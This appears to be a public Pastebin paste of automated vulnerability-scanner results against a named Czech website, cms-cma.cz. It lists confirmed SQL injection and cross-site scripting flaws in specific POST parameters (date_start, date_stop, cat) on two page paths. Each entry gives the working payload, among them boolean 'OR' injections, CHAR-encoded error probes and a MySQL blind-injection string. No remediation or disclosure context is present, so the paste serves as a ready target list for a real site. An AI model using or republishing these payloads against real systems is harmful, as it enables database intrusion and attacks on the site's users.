API tools faq
paste
Advertisement
sroub3k

cms-cma.cz

sroub3k
Dec 19th, 2013
144
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.84 KB | None | 0 0
raw download clone embed print report
  1. ||| Boolean Based SQL Injection
  2.  
  3. Severity: Critical
  4. Confirmation: Confirmed
  5. URL: http://www.cms-cma.cz/zobrazit/aktuality/-/1
  6. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  7. Parameter Name: date_start
  8. Parameter Type: Post
  9. Attack Pattern: ' OR 'ns'='ns
  10.  
  11. Severity: Critical
  12. Confirmation: Confirmed
  13. URL: http://www.cms-cma.cz/zobrazit/aktuality/-/1
  14. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  15. Parameter Name: date_stop
  16. Parameter Type: Post
  17. Attack Pattern: ' OR 'ns'='ns
  18.  
  19. ||| [High Possibility] SQL Injection
  20.  
  21. Severity: Critical
  22. Confirmation: Confirmed
  23. URL: http://www.cms-cma.cz/zobrazit/aktuality/-/1
  24. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  25. Parameter Name: date_start
  26. Parameter Type: Post
  27. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  28.  
  29. Severity: Critical
  30. Confirmation: Confirmed
  31. URL: http://www.cms-cma.cz/zobrazit/aktuality/-/1
  32. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  33. Parameter Name: date_start
  34. Parameter Type: Post
  35. Attack Pattern: '+NSFTW+'
  36.  
  37. Severity: Critical
  38. Confirmation: Confirmed
  39. URL: http://www.cms-cma.cz/zobrazit/aktuality/-/1
  40. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  41. Parameter Name: date_stop
  42. Parameter Type: Post
  43. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  44.  
  45. Severity: Critical
  46. Confirmation: Confirmed
  47. URL: http://www.cms-cma.cz/zobrazit/aktuality/-/1
  48. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  49. Parameter Name: date_stop
  50. Parameter Type: Post
  51. Attack Pattern: '+NSFTW+'
  52.  
  53. Severity: Critical
  54. Confirmation: Confirmed
  55. URL: http://www.cms-cma.cz/zobrazit/archiv/-/1
  56. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  57. Parameter Name: cat
  58. Parameter Type: Post
  59. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  60.  
  61. Severity: Critical
  62. Confirmation: Confirmed
  63. URL: http://www.cms-cma.cz/zobrazit/archiv/-/1
  64. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  65. Parameter Name: cat
  66. Parameter Type: Post
  67. Attack Pattern: '+NSFTW+'
  68.  
  69. Severity: Critical
  70. Confirmation: Confirmed
  71. URL: http://www.cms-cma.cz/zobrazit/archiv/-/1
  72. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  73. Parameter Name: date_start
  74. Parameter Type: Post
  75. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  76.  
  77. Severity: Critical
  78. Confirmation: Confirmed
  79. URL: http://www.cms-cma.cz/zobrazit/archiv/-/1
  80. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  81. Parameter Name: date_stop
  82. Parameter Type: Post
  83. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  84.  
  85. Severity: Critical
  86. Confirmation: Confirmed
  87. URL: http://www.cms-cma.cz/zobrazit/archiv/-/1
  88. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  89. Parameter Name: date_stop
  90. Parameter Type: Post
  91. Attack Pattern: '+NSFTW+'
  92.  
  93. ||| XSS (Cross-site Scripting)
  94.  
  95. Severity: Important
  96. Confirmation: Confirmed
  97. Vulnerable URL: http://www.cms-cma.cz/zobrazit/archiv/-/1
  98. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  99. Parameter Name: cat
  100. Parameter Type: Post
  101. Attack Pattern: '" ns=alert(0x000A9F)
  102.  
  103. Severity: Important
  104. Confirmation: Confirmed
  105. URL: http://www.cms-cma.cz/zobrazit/aktuality/-/1
  106. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  107. Parameter Name: date_start
  108. Parameter Type: Post
  109. Attack Pattern: '"><net sparker=alert(0x000AC5)>
  110.  
  111. Severity: Important
  112. Confirmation: Confirmed
  113. URL: http://www.cms-cma.cz/zobrazit/aktuality/-/1
  114. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  115. Parameter Name: date_stop
  116. Parameter Type: Post
  117. Attack Pattern: '" ns=alert(0x000F62)
  118.  
  119. Severity: Important
  120. Confirmation: Confirmed
  121. URL: http://www.cms-cma.cz/zobrazit/archiv/-/1
  122. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  123. Parameter Name: date_start
  124. Parameter Type: Post
  125. Attack Pattern: '"><net sparker=alert(0x001299)>
  126.  
  127. ||| MySQL Database Identified
  128.  
  129. Severity: Information
  130. Confirmation: Confirmed
  131. URL: http://www.cms-cma.cz/zobrazit/aktuality/-/1
  132. Parameter Name: date_start
  133. Parameter Type: Post
  134. Attack Pattern: -1'OR 1=1)) AND 1=(SELECT IF((IFNULL(ASCII(SUBSTRING((SELECT CONCAT(CHAR(78),CHAR(69),CHAR(84),CHAR(83),CHAR(80),CHAR(65),CHAR(82),CHAR(75),CHAR(69),CHAR(82))),5,1)),0)=88),1,2))--
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!